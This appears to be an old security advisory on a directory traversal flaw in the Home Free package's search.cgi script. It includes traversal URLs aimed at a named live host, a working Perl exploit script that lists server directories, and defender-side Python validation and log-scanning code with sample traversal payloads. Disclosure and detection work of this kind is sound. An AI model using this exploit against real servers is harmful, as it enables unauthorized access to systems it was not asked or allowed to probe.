COMMAND
search.cgi
SYSTEMS AFFECTED
SolutionScripts.com Home Free CGI package
PROBLEM
The following is based on a security advisory by #!/bin/csh.
SolutionScripts.com is a vendor of Perl CGI scripts for all
platforms that support the language (WinNT, Linux, various Unix
flavors). Home Free is a package developed and marketed by
SolutionScripts.com; below is an extract from their website:
"Home Free is the ultimate community building program.
Allowing you to give your visitors a free web site on your
server. With complete control over every aspect of your free
web site program, you can grow page views, revenue and brand
awareness for your site."
http://solutionscripts.com/vault/homefree/index.shtml
Home Free is used by many popular websites. It allows users to
set up and maintain their websites through a series of CGI scripts
without posing a threat to system security. Home Free consists of
the following files from an end-user point of view:
./features.cgi
./new.cgi
./search.cgi
./signup.cgi
./user_files.cgi
./user_formmail.cgi
./user_ftp_import.cgi
./user_gbook.cgi
./user_manage.cgi
./user_pref.cgi
./user_uploads.cgi
./user_wwwboard.cgi
There are also various 'admin' CGI scripts in the package, such
as:
./admin.cgi
./admin_browse.cgi
./admin_cata.cgi
./admin_email.cgi
./admin_features.cgi
./admin_setup.cgi
./admin_update.cgi
The search.cgi script uses the following input variables:
letter=any string
cata=any string
perpage=any string
start=any string
boolean=or/and
advanced
This CGI script can be exploited to view directory listings on the
host server. A vulnerability exists because of insufficient
bounds checking of the 'letter' variable when it is parsed by
the search.cgi script, for example:
http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt
The above URL will list the \winnt directory of the host. The
search.cgi script also seems to read and display the first line
of each file (network.wri, et al). Those who found this
vulnerability have been unable to use the search.cgi script or
any of the other scripts in the package to view files to date.
You can also exploit the vulnerability to view other directory
listings, such as the /cgi-bin directory under Apache.
http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin
#!/bin/csh also wrote a short Perl script that displays the
directory listings of vulnerable servers:
#!/usr/bin/perl
#
# Quick exploit of the Home Free ./search.cgi script, allows you to list
# directories on the host.
#
# Default server is antionline's, change as appropriate.
#
use IO::Socket;

# The only argument is the directory to list, appended to the traversal prefix.
if ($ARGV[0] eq "") { die "no argument\n"; }

# Open a plain TCP connection to the web server on port 80.
$asoc = IO::Socket::INET->new(Proto    => "tcp",
                              PeerAddr => "members.antionline.com",
                              PeerPort => 80) ||
    die "can't connect to host: $!";
select($asoc);
$| = 1;    # autoflush the socket so the request goes out immediately

# Send the request with the traversal sequence in the 'letter' parameter.
print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";

# Each directory entry comes back as a table cell containing a link;
# pull the file name out of the HREF and print it.
while (<$asoc>) {
    if ($_ =~ /.+HREF.+TD.+/) {
        @parts = split("\"", $_);
        $foo   = $parts[1];
        @parts = split("/", $foo);
        print STDOUT $parts[3];
        print STDOUT "\n";
    }
}
close($asoc);    # close the socket handle opened above
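As an added defender-side example (not part of the advisory or of the Home Free package), the following Python shows the allow-list check a hardened search.cgi would apply to 'letter' and a log scan that flags traversal attempts against search.cgi. It folds backslashes to slashes because the advisory's payload uses Windows-style '..\' sequences; the single-character rule for 'letter' and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption (not stated by the advisory): a legitimate 'letter' value is a
# single alphanumeric index character, so anything else is rejected up front.
ALLOWED_LETTER = re.compile(r"\A[A-Za-z0-9]\Z")

def has_traversal(value: str) -> bool:
    """True if the value walks up the directory tree. Backslashes are folded
    to slashes (the advisory's payload is '..\\..\\'), and percent-decoding is
    applied twice to catch double-encoded '%252e%252e' variants."""
    decoded = unquote(unquote(value)).replace("\\", "/")
    return ".." in decoded.split("/")

def letter_is_safe(value: str) -> bool:
    """Allow-list check a hardened search.cgi would apply before using 'letter'."""
    return bool(ALLOWED_LETTER.match(value)) and not has_traversal(value)

def suspicious_params(request_target: str) -> dict:
    """Map each query parameter of a request target to its traversal values."""
    qs = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return {k: [v for v in vals if has_traversal(v)]
            for k, vals in qs.items() if any(has_traversal(v) for v in vals)}

def flag_log_lines(lines):
    """Return request targets from common-log-format lines that hit search.cgi
    with a traversal sequence in any parameter (other scripts are ignored)."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', line)
        if not m:
            continue
        target = m.group(1)
        if target.split("?")[0].endswith("/search.cgi") and suspicious_params(target):
            hits.append(target)
    return hits

# Constructed sample access-log lines; addresses and timestamps are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/search.cgi?letter=a&start=1 HTTP/1.0" 200 1532',
    r'10.0.0.9 - - [01/Jan/2000:10:00:01 +0000] "GET /cgi-bin/search.cgi?letter=..\..\..\..\winnt&start=1&perpage=all HTTP/1.0" 200 8841',
    '10.0.0.9 - - [01/Jan/2000:10:00:02 +0000] "GET /cgi-bin/search.cgi?letter=%2e%2e%2f%2e%2e%2fetc&cata=x HTTP/1.0" 200 512',
    '10.0.0.7 - - [01/Jan/2000:10:00:03 +0000] "GET /cgi-bin/new.cgi?letter=..%5c..%5cwinnt HTTP/1.0" 404 220',
]

if __name__ == "__main__":
    for target in flag_log_lines(SAMPLE_LOG):
        print("traversal attempt:", target, suspicious_params(target))
```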
Other smaller problems were identified when testing the bounds
checking and flexibility of the other scripts, such as
user_manage.cgi. Without access to the source code of the Perl
scripts in question, it is very difficult to know the security
implications of such problems.
SOLUTION
Nothing yet.